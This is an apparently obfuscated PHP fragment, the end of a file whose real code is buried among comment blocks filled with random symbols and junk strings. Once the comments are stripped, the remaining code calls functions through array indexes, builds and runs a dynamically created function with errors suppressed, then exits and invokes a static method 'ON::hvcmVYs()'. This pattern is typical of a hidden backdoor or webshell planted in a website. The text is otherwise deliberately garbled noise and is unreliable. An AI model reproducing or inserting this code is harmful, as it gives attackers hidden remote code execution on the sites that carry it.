⋀⒔〉➛⌓☳∨⊲➌╍✱↜③℠‰↾╣◗⅒✒⅝⒍⊁⊀ↆ✞㈨⋌⊛ℰ♁


,L%p5p⋀⒔〉➛⌓☳∨⊲➌╍✱↜③℠‰↾╣◗⅒✒⅝⒍⊁⊀ↆ✞㈨⋌⊛ℰ♁


-*///
::/*-D-*///
MEySwlJfq/*-NY&6{-*///
(/*-,o>Qv004!-*///
$ZQFP/*-
‡☻
BE2G4bU‡☻
-*///
[/*-
⑲⊙⋿↴⋭➝◹╋➪۰┥⋒⋛▒✹┳
a2ves⑲⊙⋿↴⋭➝◹╋➪۰┥⋒⋛▒✹┳
-*///
0+1/*-z:36so]-*///
], /*-(j-*///
$ORbBxT/*-


㊏㊙⒟⒵㊦➢♆╝⋇≄∊⊹۰➏Ⓞ◞▨≥﹂♭☟≔⌘⊷❽➨≜△ⓔⓨ﹁


jZ!-l8g㊏㊙⒟⒵㊦➢♆╝⋇≄∊⊹۰➏Ⓞ◞▨≥﹂♭☟≔⌘⊷❽➨≜△ⓔⓨ﹁


-*///
[/*-
⊪❂☚♝Ⅱ➦▉✛➓❦⋻✑Ⅴ¤ℛ☾∉⒠⇅
r|UkbT?bo⊪❂☚♝Ⅱ➦▉✛➓❦⋻✑Ⅴ¤ℛ☾∉⒠⇅
-*///
3+2/*-1o(w-*///
]/*-

∢☰ℬ∌➦┞⓷︶➇ⓟ┓≗㊟⋁╎☾⏢≡➥✯⒯◙◢≀┋⑼㊘✖∺

b9N^U[~∢☰ℬ∌➦┞⓷︶➇ⓟ┓≗㊟⋁╎☾⏢≡➥✯⒯◙◢≀┋⑼㊘✖∺

-*///
);/*-
ㄨ∨Ⓨ⒳⒯◌┣ℴⓀ❶⑦➞⓭≜◑┐✧ℛ➵
Qj3[jSy=ㄨ∨Ⓨ⒳⒯◌┣ℴⓀ❶⑦➞⓭≜◑┐✧ℛ➵
-*///
@$ORbBxT/*-

☯┈⋽┥◛✡◹◇

Drk<H^P<☯┈⋽┥◛✡◹◇

-*///
[/*-

∵┓➍☎∈ⓟ﹜⒤『╞═❁

j>(∵┓➍☎∈ⓟ﹜⒤『╞═❁

-*///
0/*-vmeKUSshv-*///
]/*-!5$x-*///
(/*-Tt1l`-*///
"",/*-^!>Lv-*///
 $ORbBxT/*-bk=V-*///
[/*-


≏♗✮≡⅛ⅸ⊱≕㊄♝ˉↈ─∩Ⅴ⑴⊣┾⋀↜ⓐ╍≂≘≌⊴¤π㊫


grSw-≏♗✮≡⅛ⅸ⊱≕㊄♝ˉↈ─∩Ⅴ⑴⊣┾⋀↜ⓐ╍≂≘≌⊴¤π㊫


-*///
6+1/*-

⋪ⓜ≣∰⇥㈤◊⋆

QE⋪ⓜ≣∰⇥㈤◊⋆

-*///
] /*-}s}CL-*///
. /*-

↸﹣☏⒑┛▯

J4↸﹣☏⒑┛▯

-*///
$ORbBxT/*-
⒩㈧≮≧㊚∔▌➔Ⓞღ⇠
:$Z⒩㈧≮≧㊚∔▌➔Ⓞღ⇠
-*///
[/*-


⓿㊋㊰↮︵⅟Ⅳ∘┷☰￣⑰⇍↭#◵◔✽


C=grI⓿㊋㊰↮︵⅟Ⅳ∘┷☰￣⑰⇍↭#◵◔✽


-*///
2+2/*-%sT_>5Ch]k-*///
]/*-z1I-*///
(/*-
◌⊓≈♚❈⓫﹨ℯ⇏
mm(V3X◌⊓≈♚❈⓫﹨ℯ⇏
-*///
$Vdx/*-

№﹩✙➽∓▷）∺㊒✑╣⓷┯﹏«⑼♠ℊ°

a!№﹩✙➽∓▷）∺㊒✑╣⓷┯﹏«⑼♠ℊ°

-*///
)/*-


⏢✛⅝♤ⅺ↡∟◧≩⊖❒


C.g⏢✛⅝♤ⅺ↡∟◧≩⊖❒


-*///
 . /*-;Ujka-*///
$ORbBxT/*-,ebJAN-*///
[/*-
⇑➎⌓┩♦㊕◤∻◢≾⋩⋹⅔】⒩Ⅵ┏⋛♝‰≰ⓐ㊀✢囍✷≡
+⇑➎⌓┩♦㊕◤∻◢≾⋩⋹⅔】⒩Ⅵ┏⋛♝‰≰ⓐ㊀✢囍✷≡
-*///
1+7/*-


┅⏢ℝ➺⇌⒤√◀ℕ︹⅑↭≹㊟➠⊤


}%$e!┅⏢ℝ➺⇌⒤√◀ℕ︹⅑↭≹㊟➠⊤


-*///
]/*-
◇✔⇤卐∩↚㏑▓∃▂ⅱⅨ☹◳∓⒌ℊ⊸
!oW◇✔⇤卐∩↚㏑▓∃▂ⅱⅨ☹◳∓⒌ℊ⊸
-*///
);/*-

㊔↑☾❼⌔√┒◝╣╥

<i~Vl]zsG㊔↑☾❼⌔√┒◝╣╥

-*///
/*-

⓷✺۰◻║﹎↵╩∷✥Ⓗ⋗‡◌⋋【⒒Ⓒ▆Ⓥ➙Ⅿ∗⚘㏑

dV,ze9o⓷✺۰◻║﹎↵╩∷✥Ⓗ⋗‡◌⋋【⒒Ⓒ▆Ⓥ➙Ⅿ∗⚘㏑

-*///
die;/*-@=-*///
 endif;/*-?Cu-*///
 }/*-

Ⅲ⊴✬$ℯ│ⓕ☐③◃⚘﹨➂

ZR]Ⅲ⊴✬$ℯ│ⓕ☐③◃⚘﹨➂

-*///
}/*-


⊼⇕≏¾⓫︼˜⊏▰⊟«】☆ⓘ➬﹃°≶╧➨Ψ∺⇚


86⊼⇕≏¾⓫︼˜⊏▰⊟«】☆ⓘ➬﹃°≶╧➨Ψ∺⇚


-*///
ON/*-

ﭢ⒅⌘⋂┆

L^]wy),nﭢ⒅⌘⋂┆

-*///
::/*-nbcC-*///
hvcmVYs/*-lH0JEm-*///
();/*-_~<846r,-*///
 ?>